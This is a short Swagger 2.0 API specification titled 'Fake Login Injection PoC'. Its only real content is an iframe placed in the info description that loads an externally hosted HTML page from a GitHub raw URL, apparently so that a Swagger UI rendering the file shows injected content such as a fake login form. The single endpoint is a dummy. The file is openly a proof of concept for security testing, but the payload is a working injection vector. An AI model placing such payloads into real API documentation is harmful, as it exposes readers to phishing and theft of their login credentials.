swagger: '2.0'
info:
  title: Fake Login Injection PoC
  version: 1.0.0
  description: |
    <iframe src="https://raw.githubusercontent.com/KAsSeM49/xss-dom-poc/refs/heads/main/poc.html" width="100%" height="400" style="border:none;"></iframe>
paths:
  /test:
    get:
      summary: Dummy endpoint
      responses:
        '200':
          description: OK
